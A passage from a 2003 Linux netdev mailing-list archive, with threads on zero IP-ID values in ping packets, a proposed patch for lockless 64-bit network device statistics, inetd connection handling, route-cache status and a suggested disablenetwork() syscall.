2003 05:38:29 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h67CdVBo006132; Mon, 7 Jul 2003 21:39:31 +0900 Date: Mon, 07 Jul 2003 21:39:30 +0900 (JST) Message-Id: <20030707.213930.07095787.yoshfuji@linux-ipv6.org> To: solt@dns.toxicfilms.tv Cc: kohei@cysols.com, netdev@oss.sgi.com Subject: Re: IP-ID field of ICMP echo request From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <3F095B7B.5090203@cysols.com> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3798 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Mon, 7 Jul 2003 14:29:28 +0200 (CEST)), Maciej Soltysiak says: > > I found a strange packet, which is generated by ping of Linux. > > It is observed ID field of IP header in ping packet (Echo request) is always 0. > > > > I confirmed this on kernel 2.4.18 and 2.4.21. > > My colleague also confirmed this is fixed in kernel 2.5.74. > > > > I hope this is fixed in next next 2.4.x release. > RFC 792 says: > ... > Identifier > > If code = 0, an identifier to aid in matching echos and replies, > may be zero. > ... > > I guess it is okay to have 0 as IPID. No, he is not talking about ICMP Identifier (RFC792 Page 14), but IP Identification (RFC791 Page 29). --yoshfuji From solt@dns.toxicfilms.tv Mon Jul 7 05:48:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 05:48:55 -0700 (PDT) Received: from dns.toxicfilms.tv (postfix@dns.toxicfilms.tv [150.254.37.24]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67Cmh2x026907 for ; Mon, 7 Jul 2003 05:48:44 -0700 Received: by dns.toxicfilms.tv (Postfix, from userid 1000) id DB64A309B3F; Mon, 7 Jul 2003 14:48:41 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by dns.toxicfilms.tv (Postfix) with ESMTP id DAA0A187055E; Mon, 7 Jul 2003 14:48:41 +0200 (CEST) Date: Mon, 7 Jul 2003 14:48:41 +0200 (CEST) From: Maciej Soltysiak To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= Cc: kohei@cysols.com, netdev@oss.sgi.com Subject: Re: IP-ID field of ICMP echo request In-Reply-To: <20030707.213930.07095787.yoshfuji@linux-ipv6.org> Message-ID: References: <3F095B7B.5090203@cysols.com> <20030707.213930.07095787.yoshfuji@linux-ipv6.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3799 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: solt@dns.toxicfilms.tv Precedence: bulk X-list: netdev > No, he is not talking about ICMP Identifier (RFC792 Page 14), > but IP Identification (RFC791 Page 29). Aah, yes, I misread. Sorry. Anyway I tested it on 2.4.2 and 2.4.18, 2.5.74 and 2.4.21, they set IP ID to 0. At first I thought it was that issue with early 2.4, but it seems it has been there for a while. > --yoshfuji Maciej From yoshfuji@linux-ipv6.org Mon Jul 7 06:10:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 06:10:12 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67DA32x027424 for ; Mon, 7 Jul 2003 06:10:04 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h67DBJBo006382; Mon, 7 Jul 2003 22:11:19 +0900 Date: Mon, 07 Jul 2003 22:11:19 +0900 (JST) Message-Id: <20030707.221119.105548240.yoshfuji@linux-ipv6.org> To: kohei@cysols.com CC: netdev@oss.sgi.com, solt@dns.toxicfilms.tv Subject: Re: IP-ID field of ICMP echo request From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <20030707.213930.07095787.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3800 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Mon, 7 Jul 2003 14:48:41 +0200 (CEST)), Maciej Soltysiak says: > > No, he is not talking about ICMP Identifier (RFC792 Page 14), > > but IP Identification (RFC791 Page 29). > Aah, yes, I misread. Sorry. > > Anyway I tested it on 2.4.2 and 2.4.18, 2.5.74 and 2.4.21, they set IP ID > to 0. At first I thought it was that issue with early 2.4, but it seems it > has been there for a while. It seems linux-2.2.22 behaves similarly. Well..., I remember the DF bit. Kohei, add "-M dont" option (do not set DF flag) and we can see non-zero IPID, can't we? -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From linux_4ever@yahoo.com Mon Jul 7 07:03:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 07:03:47 -0700 (PDT) Received: from web9602.mail.yahoo.com (web9602.mail.yahoo.com [216.136.129.181]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67E3h2x028642 for ; Mon, 7 Jul 2003 07:03:44 -0700 Message-ID: <20030707140343.14852.qmail@web9602.mail.yahoo.com> Received: from [207.69.99.207] by web9602.mail.yahoo.com via HTTP; Mon, 07 Jul 2003 07:03:43 PDT Date: Mon, 7 Jul 2003 07:03:43 -0700 (PDT) From: Steve G Subject: Unaccepted Connections To: netdev@oss.sgi.com MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 3801 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: linux_4ever@yahoo.com Precedence: bulk X-list: netdev Hello, I have a user space programming question and need some ideas from networking gurus. I am working on a well known inet daemon that listens for tcp connections and passes the descriptor returned by listen() to a child program to handle in the tcp/wait mode. It turns out that many child programs error during their startup and exit without accepting the connection (linuxconf is one of them). The daemon that listens sees the descriptor as readable and starts a new child...which dies. This can loop forever. The questions are: 1) How can a parent process reliably determine that its child has indeed accepted the connection? (ptrace is not a good solution.) 2) Is it possible to tell anything about a connection that has returned from listen but not yet accepted? For instance the source IP address? Or checksum? Can recvfrom PEEK into the packet? Thanks, Steve Grubb __________________________________ Do you Yahoo!? SBC Yahoo! DSL - Now only $29.95 per month! http://sbc.yahoo.com From kaber@trash.net Mon Jul 7 07:05:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 07:06:02 -0700 (PDT) Received: from gw.localnet (port-212-202-52-167.reverse.qsc.de [212.202.52.167]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67E5q2x029014 for ; Mon, 7 Jul 2003 07:05:53 -0700 Received: from ws.localnet ([192.168.0.23] helo=trash.net) by gw.localnet with esmtp (Exim 3.36 #1 (Debian)) id 19ZWbe-0002RM-00; Mon, 07 Jul 2003 16:04:38 +0200 Message-ID: <3F097E4D.1080707@trash.net> Date: Mon, 07 Jul 2003 16:06:05 +0200 From: Patrick McHardy User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3.1) Gecko/20030618 Debian/1.3.1-3 X-Accept-Language: en MIME-Version: 1.0 To: Linux Kernel Mailing List CC: netdev@oss.sgi.com Subject: RFC: another approach for 64-bit network stats Content-Type: multipart/mixed; boundary="------------050706090100050808080106" X-archive-position: 3802 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kaber@trash.net Precedence: bulk X-list: netdev This is a multi-part message in MIME format. --------------050706090100050808080106 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit This patch implements a lockless aproach for 64-bit netstatistics with only a very rare racecondition. On 64 bit system, nothing is changed. On 32 bit system the (32bit) counter is checked periodically for overflows. The overflows are saved in counter_high. To detect overflows, we need to save the counter value when last checked (counter_last), so there is a 4byte overhead per 64bit counter. The 32-bit values can be accessed as before through stats->counter, the 64bit values are accessed through a macro NETSTAT64(stats, counter). Accessing the 64bit values contains the before mentioned race-condition, when the counters are synced while they are read and an overflow occured the value could be of 4gb. However the next read will return the correct value and with gigabit speed we only need to sync every ~30s, so thats much better than racing on every counter update (using 64bit counters directly) and potentially damaging the counter permanently. The race could be avoided by locking syncs and reads (not normal counter updates). The patch only breaks binary interfaces, all in-kernel users can continue to use the 32bit values until they have been changed, userspace software just needs recompilation, device drivers don't need any changes at all. Comments ? Bye, Patrick --------------050706090100050808080106 Content-Type: text/plain; name="netstats64.diff" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="netstats64.diff" ===== include/linux/netdevice.h 1.45 vs edited ===== --- 1.45/include/linux/netdevice.h Wed Jul 2 09:20:08 2003 +++ edited/include/linux/netdevice.h Mon Jul 7 15:09:05 2003 @@ -91,41 +91,83 @@ #endif /* + * Macros for lockless 64 bit netdevice statistics. On 32-bit arches + * the counter is checked periodically for overflows. The overflows + * are carried in name_high. The updates are not atomic, there is a + * race between updating and reading the counters, however this is a + * very rare condition. + */ + +#if (BITS_PER_LONG == 64) + +#define DECLARE_NETSTAT64(name) \ + unsigned long name +#define NETSTAT64(stats, name) \ + ((unsigned long long)(stats)->name) + +#else + +#define DECLARE_NETSTAT64(name) \ + unsigned long name; \ + unsigned long name##_high; \ + unsigned long name##_last + +#define NETSTAT64(stats, name) \ +({ \ + unsigned long cnt = (stats)->name; \ + int carry = (stats)->name##_last > cnt; \ + ((unsigned long long)((stats)->name##_high + carry) << 32 | cnt); \ +}) + +#define NETSTAT64_SYNC(stats, name) \ +do { \ + unsigned long cnt = (stats)->name; \ + if ((stats)->name##_last > cnt) \ + (stats)->name##_high++; \ + (stats)->name##_last = cnt; \ +} while(0) + +/* 32bit overflow about every 34s at full gigabit speed */ +#define NETSTATS64_SYNC_INTERVAL 30 + +#endif + +/* * Network device statistics. Akin to the 2.0 ether stats but * with byte counters. */ struct net_device_stats { - unsigned long rx_packets; /* total packets received */ - unsigned long tx_packets; /* total packets transmitted */ - unsigned long rx_bytes; /* total bytes received */ - unsigned long tx_bytes; /* total bytes transmitted */ - unsigned long rx_errors; /* bad packets received */ - unsigned long tx_errors; /* packet transmit problems */ - unsigned long rx_dropped; /* no space in linux buffers */ - unsigned long tx_dropped; /* no space available in linux */ - unsigned long multicast; /* multicast packets received */ - unsigned long collisions; + DECLARE_NETSTAT64(rx_packets); /* total packets received */ + DECLARE_NETSTAT64(tx_packets); /* total packets transmitted */ + DECLARE_NETSTAT64(rx_bytes); /* total bytes received */ + DECLARE_NETSTAT64(tx_bytes); /* total bytes transmitted */ + DECLARE_NETSTAT64(rx_errors); /* bad packets received */ + DECLARE_NETSTAT64(tx_errors); /* packet transmit problems */ + DECLARE_NETSTAT64(rx_dropped); /* no space in linux buffers */ + DECLARE_NETSTAT64(tx_dropped); /* no space available in linux */ + DECLARE_NETSTAT64(multicast); /* multicast packets received */ + DECLARE_NETSTAT64(collisions); /* detailed rx_errors: */ - unsigned long rx_length_errors; - unsigned long rx_over_errors; /* receiver ring buff overflow */ - unsigned long rx_crc_errors; /* recved pkt with crc error */ - unsigned long rx_frame_errors; /* recv'd frame alignment error */ - unsigned long rx_fifo_errors; /* recv'r fifo overrun */ - unsigned long rx_missed_errors; /* receiver missed packet */ + DECLARE_NETSTAT64(rx_length_errors); + DECLARE_NETSTAT64(rx_over_errors); /* receiver ring buff overflow */ + DECLARE_NETSTAT64(rx_crc_errors); /* recved pkt with crc error */ + DECLARE_NETSTAT64(rx_frame_errors); /* recv'd frame alignment error */ + DECLARE_NETSTAT64(rx_fifo_errors); /* recv'r fifo overrun */ + DECLARE_NETSTAT64(rx_missed_errors); /* receiver missed packet */ /* detailed tx_errors */ - unsigned long tx_aborted_errors; - unsigned long tx_carrier_errors; - unsigned long tx_fifo_errors; - unsigned long tx_heartbeat_errors; - unsigned long tx_window_errors; + DECLARE_NETSTAT64(tx_aborted_errors); + DECLARE_NETSTAT64(tx_carrier_errors); + DECLARE_NETSTAT64(tx_fifo_errors); + DECLARE_NETSTAT64(tx_heartbeat_errors); + DECLARE_NETSTAT64(tx_window_errors); /* for cslip etc */ - unsigned long rx_compressed; - unsigned long tx_compressed; + DECLARE_NETSTAT64(rx_compressed); + DECLARE_NETSTAT64(tx_compressed); }; ===== net/core/dev.c 1.89 vs edited ===== --- 1.89/net/core/dev.c Thu Jul 3 09:32:44 2003 +++ edited/net/core/dev.c Mon Jul 7 13:53:38 2003 @@ -1869,23 +1870,33 @@ struct net_device_stats *stats = dev->get_stats ? dev->get_stats(dev) : NULL; if (stats) - seq_printf(seq, "%6s:%8lu %7lu %4lu %4lu %4lu %5lu %10lu %9lu " - "%8lu %7lu %4lu %4lu %4lu %5lu %7lu %10lu\n", - dev->name, stats->rx_bytes, stats->rx_packets, - stats->rx_errors, - stats->rx_dropped + stats->rx_missed_errors, - stats->rx_fifo_errors, - stats->rx_length_errors + stats->rx_over_errors + - stats->rx_crc_errors + stats->rx_frame_errors, - stats->rx_compressed, stats->multicast, - stats->tx_bytes, stats->tx_packets, - stats->tx_errors, stats->tx_dropped, - stats->tx_fifo_errors, stats->collisions, - stats->tx_carrier_errors + - stats->tx_aborted_errors + - stats->tx_window_errors + - stats->tx_heartbeat_errors, - stats->tx_compressed); + seq_printf(seq, "%6s:%8llu %7llu %4llu %4llu %4llu %5llu " + "%10llu %9llu %8llu %7llu %4llu %4llu %4llu " + "%5llu %7llu %10llu\n", + dev->name, + NETSTAT64(stats, rx_bytes), + NETSTAT64(stats, rx_packets), + NETSTAT64(stats, rx_errors), + NETSTAT64(stats, rx_dropped) + + NETSTAT64(stats, rx_missed_errors), + NETSTAT64(stats, rx_fifo_errors), + NETSTAT64(stats, rx_length_errors) + + NETSTAT64(stats, rx_over_errors) + + NETSTAT64(stats, rx_crc_errors) + + NETSTAT64(stats, rx_frame_errors), + NETSTAT64(stats, rx_compressed), + NETSTAT64(stats, multicast), + NETSTAT64(stats, tx_bytes), + NETSTAT64(stats, tx_packets), + NETSTAT64(stats, tx_errors), + NETSTAT64(stats, tx_dropped), + NETSTAT64(stats, tx_fifo_errors), + NETSTAT64(stats, collisions), + NETSTAT64(stats, tx_carrier_errors) + + NETSTAT64(stats, tx_aborted_errors) + + NETSTAT64(stats, tx_window_errors) + + NETSTAT64(stats, tx_heartbeat_errors), + NETSTAT64(stats, tx_compressed)); else seq_printf(seq, "%6s: No statistics available.\n", dev->name); } @@ -2943,6 +2954,56 @@ return 0; } +#if (BITS_PER_LONG != 64) +static void netstats64_sync_work(void *); +static DECLARE_WORK(netstats64_work, netstats64_sync_work, NULL); + +static inline void netstats64_schedule_work(void) +{ + schedule_delayed_work(&netstats64_work, NETSTATS64_SYNC_INTERVAL * HZ); +} + +static void netstats64_sync_work(void *data) +{ + struct net_device *dev; + struct net_device_stats *stats; + + read_lock_bh(&dev_base_lock); + for (dev = dev_base; dev; dev = dev->next) { + stats = dev->get_stats ? dev->get_stats(dev) : NULL; + if (!stats) + continue; + NETSTAT64_SYNC(stats, rx_packets); + NETSTAT64_SYNC(stats, tx_packets); + NETSTAT64_SYNC(stats, rx_bytes); + NETSTAT64_SYNC(stats, tx_bytes); + NETSTAT64_SYNC(stats, rx_errors); + NETSTAT64_SYNC(stats, tx_errors); + NETSTAT64_SYNC(stats, rx_dropped); + NETSTAT64_SYNC(stats, tx_dropped); + NETSTAT64_SYNC(stats, multicast); + NETSTAT64_SYNC(stats, collisions); + + NETSTAT64_SYNC(stats, rx_length_errors); + NETSTAT64_SYNC(stats, rx_over_errors); + NETSTAT64_SYNC(stats, rx_crc_errors); + NETSTAT64_SYNC(stats, rx_frame_errors); + NETSTAT64_SYNC(stats, rx_fifo_errors); + NETSTAT64_SYNC(stats, rx_missed_errors); + + NETSTAT64_SYNC(stats, tx_aborted_errors); + NETSTAT64_SYNC(stats, tx_carrier_errors); + NETSTAT64_SYNC(stats, tx_fifo_errors); + NETSTAT64_SYNC(stats, tx_heartbeat_errors); + NETSTAT64_SYNC(stats, tx_window_errors); + + NETSTAT64_SYNC(stats, rx_compressed); + NETSTAT64_SYNC(stats, tx_compressed); + } + read_unlock_bh(&dev_base_lock); + netstats64_schedule_work(); +} +#endif /* * Initialize the DEV module. At boot time this walks the device list and @@ -3082,6 +3143,9 @@ #ifdef CONFIG_NET_SCHED pktsched_init(); +#endif +#if (BITS_PER_LONG != 64) + netstats64_schedule_work(); #endif rc = 0; out: ===== net/core/net-sysfs.c 1.7 vs edited ===== --- 1.7/net/core/net-sysfs.c Sun Jun 15 10:21:46 2003 +++ edited/net/core/net-sysfs.c Mon Jul 7 13:57:11 2003 @@ -184,9 +184,9 @@ ssize_t (*store)(struct net_device_stats *, const char *, size_t); }; -static ssize_t net_device_stat_show(unsigned long var, char *buf) +static ssize_t net_device_stat_show(unsigned long long var, char *buf) { - return sprintf(buf, "%ld\n", var); + return sprintf(buf, "%lld\n", var); } /* generate a read-only statistics attribute */ @@ -194,7 +194,7 @@ static ssize_t show_stat_##_NAME(const struct net_device_stats *stats, \ char *buf) \ { \ - return net_device_stat_show(stats->_NAME, buf); \ + return net_device_stat_show(NETSTAT64(stats, _NAME), buf); \ } \ static struct netstat_fs_entry net_stat_##_NAME = { \ .attr = {.name = __stringify(_NAME), .mode = S_IRUGO }, \ --------------050706090100050808080106-- From garzik@gtf.org Mon Jul 7 07:30:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 07:30:58 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67EUH2x029935 for ; Mon, 7 Jul 2003 07:30:18 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id C9605664E; Mon, 7 Jul 2003 10:30:11 -0400 (EDT) Date: Mon, 7 Jul 2003 10:30:11 -0400 From: Jeff Garzik To: Patrick McHardy Cc: Linux Kernel Mailing List , netdev@oss.sgi.com Subject: Re: RFC: another approach for 64-bit network stats Message-ID: <20030707143011.GA14787@gtf.org> References: <3F097E4D.1080707@trash.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F097E4D.1080707@trash.net> User-Agent: Mutt/1.3.28i X-archive-position: 3803 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev If you don't want to poll periodically for network stats, as has been repeatedly suggested, you can always poll periodically for the 64-bit NIC-specific stats that most gige adapters provide these days, using ethtool. NIC-specific stats also tend to provide more fine granularity than the current net_device_stats members. Jeff From greearb@candelatech.com Mon Jul 7 09:53:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 09:53:33 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67GrN2x032570 for ; Mon, 7 Jul 2003 09:53:24 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h67GrIKk021734; Mon, 7 Jul 2003 09:53:18 -0700 Message-ID: <3F09A57D.8030003@candelatech.com> Date: Mon, 07 Jul 2003 09:53:17 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Patrick McHardy CC: Linux Kernel Mailing List , netdev@oss.sgi.com Subject: Re: RFC: another approach for 64-bit network stats References: <3F097E4D.1080707@trash.net> In-Reply-To: <3F097E4D.1080707@trash.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3804 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Patrick McHardy wrote: > This patch implements a lockless aproach for 64-bit netstatistics with > only a very rare > racecondition. On 64 bit system, nothing is changed. On 32 bit system I think that you should consider providing a new API as opposed to breaking existing APIs. And, perhaps this new API could deal with the very rare race to make it never happen? No matter how rare it is, you still have to write code to work around it if it exists..might as well do it once in the kernel instead of making each user of the interface deal with it. Personally, I'd like to see the net-device stats (64-bit or otherwise) available through the ethtool interface in a well defined binary package (perhaps a struct net_device_stats, or similar.) Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From jeffpc@optonline.net Mon Jul 7 10:34:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 10:34:12 -0700 (PDT) Received: from mta9.srv.hcvlny.cv.net (mta9.srv.hcvlny.cv.net [167.206.5.42]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67HY12x000816 for ; Mon, 7 Jul 2003 10:34:02 -0700 Received: from asv7.srv.hcvlny.cv.net (asv7.srv.hcvlny.cv.net [167.206.5.43]) by mta9.srv.hcvlny.cv.net (iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)) with ESMTP id <0HHO00I0V0RZAL@mta9.srv.hcvlny.cv.net> for netdev@oss.sgi.com; Mon, 07 Jul 2003 13:33:36 -0400 (EDT) Received: from jeff.home (ool-44c2049f.dyn.optonline.net [68.194.4.159]) by asv7.srv.hcvlny.cv.net (8.12.9/8.12.9) with ESMTP id h67HXjMP010298; Mon, 07 Jul 2003 13:33:48 -0400 (EDT) Date: Mon, 07 Jul 2003 13:33:43 -0400 From: Jeff Sipek Subject: Re: RFC: another approach for 64-bit network stats In-reply-to: <3F09A57D.8030003@candelatech.com> To: Ben Greear , Patrick McHardy Cc: Linux Kernel Mailing List , netdev@oss.sgi.com Message-id: <200307071333.48179.jeffpc@optonline.net> MIME-version: 1.0 Content-type: Text/Plain; charset=iso-8859-1 Content-transfer-encoding: 7BIT Content-disposition: inline Content-description: clearsigned data User-Agent: KMail/1.5.2 References: <3F097E4D.1080707@trash.net> <3F09A57D.8030003@candelatech.com> X-archive-position: 3805 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jeffpc@optonline.net Precedence: bulk X-list: netdev -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Monday 07 July 2003 12:53, Ben Greear wrote: > I think that you should consider providing a new API as opposed to > breaking existing APIs. Do you mean reworking the network statistics side of networking? Jeff. - -- Please avoid sending me Word or PowerPoint attachments. See http://www.fsf.org/philosophy/no-word-attachments.html -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE/Ca77wFP0+seVj/4RArtOAJwNVhV9PNgyli/d93n4ocCaRZzxmACeMdr8 9W0vfMOt76DNXq2t4Phoye0= =8LGV -----END PGP SIGNATURE----- From alex@pilosoft.com Mon Jul 7 11:07:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 11:07:38 -0700 (PDT) Received: from paix.pilosoft.com ([216.66.12.246]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67I7V2x001519 for ; Mon, 7 Jul 2003 11:07:31 -0700 Received: from localhost (alex@localhost) by paix.pilosoft.com (8.11.6/8.11.6) with ESMTP id h67H3Se05912 for ; Mon, 7 Jul 2003 13:03:28 -0400 Date: Mon, 7 Jul 2003 13:03:27 -0400 (EDT) From: alex@pilosoft.com To: netdev@oss.sgi.com Subject: route-cache status? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3806 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alex@pilosoft.com Precedence: bulk X-list: netdev Hello, i've been following discussions a few weeks ago regarding developments of route cache, and am trying to develop conclusion of the current best code base. From list, it seems that 2.4.20 is still better than 2.5.70+davem patches or 2.4.21. Am I correct? Are there any newer patches available? -alex From ra993482@ic.unicamp.br Mon Jul 7 12:07:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 12:07:19 -0700 (PDT) Received: from itaqui.terra.com.br (itaqui.terra.com.br [200.176.3.19]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67J732x002225 for ; Mon, 7 Jul 2003 12:07:03 -0700 Received: from tucuriba.terra.com.br (tucuriba.terra.com.br [200.176.3.53]) by itaqui.terra.com.br (Postfix) with ESMTP id 576D6810505; Mon, 7 Jul 2003 15:39:12 -0300 (BRT) Received: from ryback.home.net (unknown [200.232.206.224]) (authenticated user macwad) by tucuriba.terra.com.br (Postfix) with ESMTP id CB06D2641EC; Mon, 7 Jul 2003 15:39:10 -0300 (BRT) Subject: Re: IP-ID field of ICMP echo request From: Ulisses To: Kohei OHTA Cc: netdev@oss.sgi.com In-Reply-To: <3F095B7B.5090203@cysols.com> References: <3F095B7B.5090203@cysols.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.8 (1.0.8-9.7x.1) Date: 07 Jul 2003 15:40:36 -0300 Message-Id: <1057603237.1001.18.camel@ryback> Mime-Version: 1.0 X-archive-position: 3807 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ra993482@ic.unicamp.br Precedence: bulk X-list: netdev On Mon, 2003-07-07 at 08:37, Kohei OHTA wrote: > I found a strange packet, which is generated by ping of Linux. > It is observed ID field of IP header in ping packet (Echo request) is always 0. > > I confirmed this on kernel 2.4.18 and 2.4.21. > My colleague also confirmed this is fixed in kernel 2.5.74. > > I hope this is fixed in next next 2.4.x release. Hi, Kohei, I guess this behaviour is to prevent Idle scanning, that is based on predictable IPID numbers [1]. Therefore, the Linux TCP/IP stack uses 0 as IPID when the DF (Don't Fragment) bit is set. I'm not sure, but I think that Linux also uses peer-specific IPID numbers to make the prediction harder. -- Ulisses [1] http://www.insecure.org/nmap/idlescan.html From pekkas@netcore.fi Mon Jul 7 12:40:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 12:40:16 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67Je92x006123 for ; Mon, 7 Jul 2003 12:40:11 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h67Je3716261 for ; Mon, 7 Jul 2003 22:40:03 +0300 Date: Mon, 7 Jul 2003 22:40:02 +0300 (EEST) From: Pekka Savola To: netdev@oss.sgi.com Subject: disablenetwork() syscall? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3808 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev Hi, In a bugtraq thread, DJ Bernstein brought up an idea which I'm not sure has been brought up in the past. I'm not sure whether it's feasible or not, but at least it (and other methods to limit the functions of a user-level code) might bear consideration. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings ---------- Forwarded message ---------- Date: 4 Jul 2003 23:17:20 -0000 From: D. J. Bernstein To: bugtraq@securityfocus.com Subject: Re: Email marketing company gives out questionable security advice [...] P.S. It's hard for a portable chroot tool to cut off a program's network access. Kernel designers should provide a disablenetwork() syscall, with the disabling inherited by children. Other kernel changes would be nice, but disablenetwork() is the only critical change. From garzik@gtf.org Mon Jul 7 12:47:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 12:47:09 